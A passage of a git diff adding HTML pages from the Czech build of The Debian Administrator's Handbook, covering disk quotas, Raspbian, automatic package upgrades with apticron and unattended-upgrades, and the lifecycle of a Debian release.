+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.9. Quotas</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.asynchronous-task-scheduling-anacron.html"
+        title="9.8. Scheduling Asynchronous Tasks: anacron" /><link
+        rel="next"
+        href="sect.backup.html"
+        title="9.10. Backup" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.quotas.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.asynchronous-task-scheduling-anacron.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.backup.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.quotas"></a>9.9. Quotas</h2></div></div></div><a
+          id="id-1.12.12.2"
+          class="indexterm"></a><div
+          class="para">
+			The quota system allows limiting disk space allocated to a user or group of users. To set it up, you must have a kernel that supports it (compiled with the <code
+            class="varname">CONFIG_QUOTA</code> option) — as is the case with Debian kernels. The quota management software is found in the <span
+            class="pkg pkg">quota</span> Debian package.
+		</div><div
+          class="para">
+			To activate quota in a filesystem, you have to indicate the <code
+            class="literal">usrquota</code> and <code
+            class="literal">grpquota</code> options in <code
+            class="filename">/etc/fstab</code> for the user and group quotas, respectively. Rebooting the computer will then update the quotas in the absence of disk activity (a necessary condition for proper accounting of already used disk space).
+		</div><div
+          class="para">
+			The <code
+            class="command">edquota <em
+              class="replaceable">user</em></code> (or <code
+            class="command">edquota -g <em
+              class="replaceable">group</em></code>) command allows you to change the limits while examining current disk space usage.
+		</div><a
+          id="id-1.12.12.6"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>GOING FURTHER</em></span> Defining quotas with a script</strong></p></div></div></div><a
+            id="id-1.12.12.7.2"
+            class="indexterm"></a><div
+            class="para">
+			The <code
+              class="command">setquota</code> program can be used in a script to automatically change many quotas. Its <span
+              class="citerefentry"><span
+                class="refentrytitle">setquota</span>(8)</span> manual page details the syntax to use.
+		</div></div><div
+          class="para">
+			The quota system allows you to set four limits:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					two limits (called “soft” and “hard”) refer to the number of blocks consumed. If the filesystem was created with a block-size of 1 kibibyte, a block contains 1024 bytes from the same file. Unsaturated blocks thus induce losses of disk space. A quota of 100 blocks, which theoretically allows storage of 102,400 bytes, will however be saturated with just 100 files of 500 bytes each, only representing 50,000 bytes in total.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					two limits (soft and hard) refer to the number of inodes used. Each file occupies at least one inode to store information about it (permissions, owner, timestamp of last access, etc.). It is thus a limit on the number of user files.
+				</div></li></ul></div><div
+          class="para">
+			A “soft” limit can be temporarily exceeded; the user will simply be warned that they are exceeding the quota by the <code
+            class="command">warnquota</code> command, which is usually invoked by <code
+            class="command">cron</code>. A “hard” limit can never be exceeded: the system will refuse any operation that will cause a hard quota to be exceeded.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Blocks and inodes</strong></p></div></div></div><a
+            id="id-1.12.12.11.2"
+            class="indexterm"></a><a
+            id="id-1.12.12.11.3"
+            class="indexterm"></a><div
+            class="para">
+			The filesystem divides the hard drive into blocks — small contiguous areas. The size of these blocks is defined during creation of the filesystem, and generally varies between 1 and 8 kibibytes.
+		</div><div
+            class="para">
+			A block can be used either to store the real data of a file, or for meta-data used by the filesystem. Among this meta-data, you will especially find the inodes. An inode uses a block on the hard drive (but this block is not taken into consideration in the block quota, only in the inode quota), and contains both the information on the file to which it corresponds (name, owner, permissions, etc.) and the pointers to the data blocks that are actually used. For very large files that occupy more blocks than it is possible to reference in a single inode, there is an indirect block system; the inode references a list of blocks that do not directly contain data, but another list of blocks.
+		</div></div><a
+          id="id-1.12.12.12"
+          class="indexterm"></a><div
+          class="para">
+			With the <code
+            class="command">edquota -t</code> command, you can define a maximum authorized “grace period” within which a soft limit may be exceeded. After this period, the soft limit will be treated like a hard limit, and the user will have to reduce their disk space usage to within this limit in order to be able to write anything to the hard drive.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>GOING FURTHER</em></span> Setting up a default quota for new users</strong></p></div></div></div><div
+            class="para">
+			To automatically setup a quota for new users, you have to configure a template user (with <code
+              class="command">edquota</code> or <code
+              class="command">setquota</code>) and indicate their user name in the <code
+              class="varname">QUOTAUSER</code> variable in the <code
+              class="filename">/etc/adduser.conf</code> file. This quota configuration will then be automatically applied to each new user created with the <code
+              class="command">adduser</code> command.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.asynchronous-task-scheduling-anacron.html"><strong>Předcházející</strong>9.8. Scheduling Asynchronous Tasks: anacron</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.backup.html"><strong>Další</strong>9.10. Backup</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.raspbian.html b/tmp/cs-CZ/html/sect.raspbian.html
new file mode 100644
index 000000000..6d74ec245
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.raspbian.html
@@ -0,0 +1,91 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.12. Raspbian</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.doudoulinux.html"
+        title="A.11. DoudouLinux" /><link
+        rel="next"
+        href="sect.other-derivatives.html"
+        title="A.13. And Many More" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.raspbian.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.doudoulinux.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.other-derivatives.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.raspbian"></a>A.12. Raspbian</h2></div></div></div><a
+          id="id-1.20.15.2"
+          class="indexterm"></a><a
+          id="id-1.20.15.3"
+          class="indexterm"></a><div
+          class="para">
+			Raspbian is a rebuild of Debian optimised for the popular (and inexpensive) Raspberry Pi family of single-board computers. The hardware for that platform is more powerful than what the Debian <span
+            class="architecture architecture">armel</span> architecture can take advantage of, but lacks some features that would be required for <span
+            class="architecture architecture">armhf</span>; so Raspbian is a kind of intermediary, rebuilt specifically for that hardware and including patches targeting this computer only. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://raspbian.org">https://raspbian.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.doudoulinux.html"><strong>Předcházející</strong>A.11. DoudouLinux</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.other-derivatives.html"><strong>Další</strong>A.13. And Many More</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.regular-upgrades.html b/tmp/cs-CZ/html/sect.regular-upgrades.html
new file mode 100644
index 000000000..8c58b7249
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.regular-upgrades.html
@@ -0,0 +1,160 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.7. Keeping a System Up to Date</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.dist-upgrade.html"
+        title="6.6. Upgrading from One Stable Distribution to the Next" /><link
+        rel="next"
+        href="sect.automatic-upgrades.html"
+        title="6.8. Automatic Upgrades" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.regular-upgrades.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dist-upgrade.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.automatic-upgrades.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.regular-upgrades"></a>6.7. Keeping a System Up to Date</h2></div></div></div><div
+          class="para">
+			The Debian distribution is dynamic and changes continually. Most of the changes are in the <span
+            class="distribution distribution">Testing</span> and <span
+            class="distribution distribution">Unstable</span> versions, but even <span
+            class="distribution distribution">Stable</span> is updated from time to time, mostly for security-related fixes. Whatever version of Debian a system runs, it is generally a good idea to keep it up to date, so that you can get the benefit of recent evolutions and bug fixes.
+		</div><div
+          class="para">
+			While it is of course possible to periodically run a tool to check for available updates and run the upgrades, such a repetitive task is tedious, especially when it needs to be performed on several machines. Fortunately, like many repetitive tasks, it can be partly automated, and a set of tools have already been developed to that effect.
+		</div><div
+          class="para">
+			The first of these tools is <code
+            class="command">apticron</code>, in the package of the same name. Its main effect is to run a script daily (via <code
+            class="command">cron</code>). The script updates the list of available packages, and, if some installed packages are not in the latest available version, it sends an email with a list of these packages along with the changes that have been made in the new versions. Obviously, this package mostly targets users of Debian <span
+            class="distribution distribution">Stable</span>, since the daily emails would be very long for the faster paced versions of Debian. When updates are available, <code
+            class="command">apticron</code> automatically downloads them. It does not install them — the administrator will still do it — but having the packages already downloaded and available locally (in APT's cache) makes the job faster.
+		</div><div
+          class="para">
+			Administrators in charge of several computers will no doubt appreciate being informed of pending upgrades, but the upgrades themselves are still as tedious as they used to be. Periodic upgrades can be enabled: it uses a <code
+            class="command">systemd</code> timer unit or <code
+            class="command">cron</code>. If <span
+            class="pkg pkg">systemd</span> is not installed the <code
+            class="filename">/etc/cron.daily/apt-compat</code> script (in the <span
+            class="pkg pkg">apt</span> package) comes in handy. This script is run daily (and non-interactively) by <code
+            class="command">cron</code>. To control the behavior, use APT configuration variables (which are therefore stored in a file <code
+            class="filename">/etc/apt/apt.conf.d/10periodic</code>). The main variables are:
+		</div><div
+          class="variablelist"><dl
+            class="variablelist"><dt><span
+                class="term"> <code
+                  class="literal">APT::Periodic::Update-Package-Lists</code> </span></dt><dd><div
+                class="para">
+						This option allows you to specify the frequency (in days) at which the package lists are refreshed. <code
+                  class="command">apticron</code> users can do without this variable, since <code
+                  class="command">apticron</code> already does this task.
+					</div></dd><dt><span
+                class="term"> <code
+                  class="literal">APT::Periodic::Download-Upgradeable-Packages</code> </span></dt><dd><div
+                class="para">
+						Again, this option indicates a frequency (in days), this time for the downloading of the actual packages. Again, <code
+                  class="command">apticron</code> users won't need it.
+					</div></dd><dt><span
+                class="term"> <code
+                  class="literal">APT::Periodic::AutocleanInterval</code> </span></dt><dd><div
+                class="para">
+						This option covers a feature that <code
+                  class="command">apticron</code> doesn't have. It controls how often obsolete packages (those not referenced by any distribution anymore) are removed from the APT cache. This keeps the APT cache at a reasonable size and means that you don't need to worry about that task.
+					</div></dd><dt><span
+                class="term"> <code
+                  class="literal">APT::Periodic::Unattended-Upgrade</code> </span></dt><dd><a
+                id="id-1.9.16.6.4.2.1"
+                class="indexterm"></a><div
+                class="para">
+						When this option is enabled, the daily script will execute <code
+                  class="command">unattended-upgrade</code> (from the <span
+                  class="pkg pkg">unattended-upgrades</span> package) which — as its name suggest — can automatize the upgrade process for some packages (by default it only takes care of security updates, but this can be customized in <code
+                  class="filename">/etc/apt/apt.conf.d/50unattended-upgrades</code>). Note that this option can be set with the help of debconf by running <code
+                  class="command">dpkg-reconfigure -plow unattended-upgrades</code>.
+					</div></dd></dl></div><div
+          class="para">
+			Other options can allow you to control the cache cleaning behavior with more precision. They are not listed here, but they are described in the <code
+            class="filename">/usr/lib/apt/apt.systemd.daily</code> script.
+		</div><a
+          id="id-1.9.16.8"
+          class="indexterm"></a><div
+          class="para">
+			These tools work very well for servers, but desktop users generally prefer a more interactive system. The package <span
+            class="pkg pkg">gnome-packagekit</span> provides an icon in the notification area of desktop environments when updates are available; clicking on this icon then runs <code
+            class="command">gpk-update-viewer</code>, a simplified interface to perform updates. You can browse through available updates, read the short description of the relevant packages and the corresponding <code
+            class="filename">changelog</code> entries, and select whether to apply the update or not on a case-by-case basis.
+		</div><div
+          class="figure"><a
+            xmlns=""
+            id="id-1.9.16.10"></a><div
+            class="figure-contents"><div
+              class="mediaobject"><img
+                src="images/gnome-packagekit.png"
+                alt="Upgrading with gpk-update-viewer" /></div></div><p
+            class="title"><strong>Obrázek 6.3. Upgrading with <code
+                class="command">gpk-update-viewer</code></strong></p></div><div
+          class="para">
+			This tool is no longer installed in the default GNOME desktop. The new philosophy is that security updates should be automatically installed, either in the background or, preferably, when you shutdown your computer so as to not confuse any running application.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dist-upgrade.html"><strong>Předcházející</strong>6.6. Upgrading from One Stable Distribution to th...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.automatic-upgrades.html"><strong>Další</strong>6.8. Automatic Upgrades</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.release-lifecycle.html b/tmp/cs-CZ/html/sect.release-lifecycle.html
new file mode 100644
index 000000000..17b9c5a2b
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.release-lifecycle.html
@@ -0,0 +1,371 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.6. Lifecycle of a Release</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="sect.role-of-distributions.html"
+        title="1.5. The Role of Distributions" /><link
+        rel="next"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.release-lifecycle.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.role-of-distributions.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="case-study.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.release-lifecycle"></a>1.6. Lifecycle of a Release</h2></div></div></div><a
+          id="id-1.4.9.2"
+          class="indexterm"></a><a
+          id="id-1.4.9.3"
+          class="indexterm"></a><a
+          id="id-1.4.9.4"
+          class="indexterm"></a><a
+          id="id-1.4.9.5"
+          class="indexterm"></a><a
+          id="id-1.4.9.6"
+          class="indexterm"></a><a
+          id="id-1.4.9.7"
+          class="indexterm"></a><a
+          id="id-1.4.9.8"
+          class="indexterm"></a><div
+          class="para">
+			The project will simultaneously have three to six different versions of each program, named <span
+            class="distribution distribution">Experimental</span>, <span
+            class="distribution distribution">Unstable</span>, <span
+            class="distribution distribution">Testing</span>, <span
+            class="distribution distribution">Stable</span>, <span
+            class="distribution distribution">Oldstable</span>, and even <span
+            class="distribution distribution">Oldoldstable</span>. Each one corresponds to a different phase in development. For a good understanding, let us take a look at a program's journey, from its initial packaging to inclusion in a stable version of Debian.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Release</strong></p></div></div></div><a
+            id="id-1.4.9.10.2"
+            class="indexterm"></a><div
+            class="para">
+			The term “release”, in the Debian project, indicates a particular version of a distribution (e.g., “unstable release” means “the unstable version”). It also indicates the public announcement of the launch of any new version (stable).
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.11"></a>1.6.1. The <span
+                    class="distribution distribution">Experimental</span> Status</h3></div></div></div><div
+            class="para">
+				First let us take a look at the particular case of the <span
+              class="distribution distribution">Experimental</span> distribution: this is a group of Debian packages corresponding to the software currently in development, and not necessarily completed, explaining its name. Not everything passes through this step; some developers add packages here in order to get feedback from more experienced (or braver) users.
+			</div><div
+            class="para">
+				Otherwise, this distribution frequently houses important modifications to base packages, whose integration into <span
+              class="distribution distribution">Unstable</span> with serious bugs would have critical repercussions. It is, thus, a completely isolated distribution, its packages never migrate to another version (except by direct, express intervention of the maintainer or the ftpmasters). It is also not self-contained: only a subset of the existing packages are present in <span
+              class="distribution distribution">Experimental</span>, and it generally does not include the base system. This distribution is therefore mostly useful in combination with another, self-contained, distribution such as <span
+              class="distribution distribution">Unstable</span>.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.12"></a>1.6.2. The <span
+                    class="distribution distribution">Unstable</span> Status</h3></div></div></div><div
+            class="para">
+				Let us turn back to the case of a typical package. The maintainer creates an initial package, which they compile for the <span
+              class="distribution distribution">Unstable</span> version and place on the <code
+              class="literal">ftp-master.debian.org</code> server. This first event involves inspection and validation from the ftpmasters. The software is then available in the <span
+              class="distribution distribution">Unstable</span> distribution, which is the “cutting edge” distribution chosen by users who are more concerned with having up to date packages than worried about serious bugs. They discover the program and then test it.
+			</div><div
+            class="para">
+				If they encounter bugs, they report them to the package's maintainer. The maintainer then regularly prepares corrected versions, which they upload to the server.
+			</div><div
+            class="para">
+				Every newly updated package is updated on all Debian mirrors around the world within six hours. The users then test the corrections and search for other problems resulting from the modifications. Several updates may then occur rapidly. During these times, autobuilder robots come into action. Most frequently, the maintainer has only one traditional PC and has compiled their package on the amd64 (or i386) architecture (or they opted for a source-only upload, thus without any precompiled package); the autobuilders take over and automatically compile versions for all the other architectures. Some compilations may fail; the maintainer will then receive a bug report indicating the problem, which is then to be corrected in the next versions. When the bug is discovered by a specialist for the architecture in question, the bug report may come with a patch ready to use.
+			</div><a
+            id="id-1.4.9.12.5"
+            class="indexterm"></a><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.4.9.12.6"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/autobuilder.png"
+                  alt="Compilation of a package by the autobuilders" /></div></div><p
+              class="title"><strong>Obrázek 1.2. Compilation of a package by the autobuilders</strong></p></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> <code
+                        class="command">buildd</code>, the Debian package recompiler</strong></p></div></div></div><a
+              id="id-1.4.9.12.7.2"
+              class="indexterm"></a><a
+              id="id-1.4.9.12.7.3"
+              class="indexterm"></a><div
+              class="para">
+				<span
+                class="emphasis"><em>buildd</em></span> is the abbreviation of “build daemon”. This program automatically recompiles new versions of Debian packages on the architectures on which it is hosted (cross-compilation is avoided as much as possible).
+			</div><div
+              class="para">
+				Thus, to produce binaries for the <code
+                class="literal">arm64</code> architecture, the project has <code
+                class="literal">arm64</code> machines available. The <span
+                class="emphasis"><em>buildd</em></span> program runs on them continuously and creates binary packages for <code
+                class="literal">arm64</code> from source packages sent by Debian developers.
+			</div><div
+              class="para">
+				This software is used on all the computers serving as autobuilders for Debian. By extension, the term <span
+                class="emphasis"><em>buildd</em></span> frequently is used to refer to these machines, which are generally reserved solely for this purpose.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.13"></a>1.6.3. Migration to <span
+                    class="distribution distribution">Testing</span></h3></div></div></div><div
+            class="para">
+				A bit later, the package will have matured; compiled on all the architectures, it will not have undergone recent modifications. It is then a candidate for inclusion in the <span
+              class="distribution distribution">Testing</span> distribution — a group of <span
+              class="distribution distribution">Unstable</span> packages chosen according to some quantifiable criteria. Every day a program automatically selects the packages to include in <span
+              class="distribution distribution">Testing</span>, according to elements guaranteeing a certain level of quality:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="orderedlist"><ol><li
+                class="listitem"><div
+                  class="para">
+						lack of critical bugs, or, at least fewer than the version currently included in <span
+                    class="distribution distribution">Testing</span>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						at least 10 days spent in <span
+                    class="distribution distribution">Unstable</span>, which is sufficient time to find and report any serious problems;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						successful compilation on all officially supported architectures;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						dependencies that can be satisfied in <span
+                    class="distribution distribution">Testing</span>, or that can at least be moved there together with the package in question.
+					</div></li></ol></div><div
+            class="para">
+				This system is clearly not infallible; critical bugs are regularly found in packages included in <span
+              class="distribution distribution">Testing</span>. Still, it is generally effective, and <span
+              class="distribution distribution">Testing</span> poses far fewer problems than <span
+              class="distribution distribution">Unstable</span>, being for many, a good compromise between stability and novelty.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Limitations of <span
+                        class="distribution distribution">Testing</span></strong></p></div></div></div><div
+              class="para">
+				While very interesting in principle, <span
+                class="distribution distribution">Testing</span> does have some practical problems: the tangle of cross-dependencies between packages is such that a package can rarely move there completely on its own. With packages all depending upon each other, it is sometimes necessary to migrate a large number of packages simultaneously, which is impossible when some are uploading updates regularly. On the other hand, the script identifying the families of related packages works hard to create them (this would be an NP-complete problem, for which, fortunately, we know some good heuristics). This is why we can manually interact with and guide this script by suggesting groups of packages, or imposing the inclusion of certain packages in a group, even if this temporarily breaks some dependencies. This functionality is accessible to the Release Managers and their assistants.
+			</div><div
+              class="para">
+				Recall that an NP-complete problem is of an exponential algorithmic complexity according to the size of the data, here being the length of the code (the number of figures) and the elements involved. The only way to resolve it is frequently to examine all possible configurations, which could require enormous means. A heuristic is an approximate, but satisfying, solution.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>COMMUNITY</em></span> The Release Manager</strong></p></div></div></div><a
+              id="id-1.4.9.13.6.2"
+              class="indexterm"></a><a
+              id="id-1.4.9.13.6.3"
+              class="indexterm"></a><div
+              class="para">
+				Release Manager is an important title, associated with heavy responsibilities. The bearer of this title must, in effect, manage the release of a new, stable version of Debian, and define the process for development of <span
+                class="distribution distribution">Testing</span> until it meets the quality criteria for <span
+                class="distribution distribution">Stable</span>. They also define a tentative schedule (not always followed).
+			</div><div
+              class="para">
+				We also have Stable Release Managers, often abbreviated SRM, who manage and select updates for the current stable version of Debian. They systematically include security patches and examine all other proposals for inclusion, on a case by case basis, sent by Debian developers eager to update their package in the stable version.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.14"></a>1.6.4. The Promotion from <span
+                    class="distribution distribution">Testing</span> to <span
+                    class="distribution distribution">Stable</span></h3></div></div></div><div
+            class="para">
+				Let us suppose that our package is now included in <span
+              class="distribution distribution">Testing</span>. As long as it has room for improvement, its maintainer must continue to improve it and restart the process from <span
+              class="distribution distribution">Unstable</span> (but its later inclusion in <span
+              class="distribution distribution">Testing</span> is generally faster: unless it changed significantly, all of its dependencies are already available). When it reaches perfection, the maintainer has completed their work. The next step is the inclusion in the <span
+              class="distribution distribution">Stable</span> distribution, which is, in reality, a simple copy of <span
+              class="distribution distribution">Testing</span> at a moment chosen by the Release Manager. Ideally this decision is made when the installer is ready, and when no program in <span
+              class="distribution distribution">Testing</span> has any known critical bugs.
+			</div><div
+            class="para">
+				Since this moment never truly arrives, in practice, Debian must compromise: remove packages whose maintainer has failed to correct bugs on time, or agree to release a distribution with some bugs in the thousands of programs. The Release Manager will have previously announced a freeze period, during which each update to <span
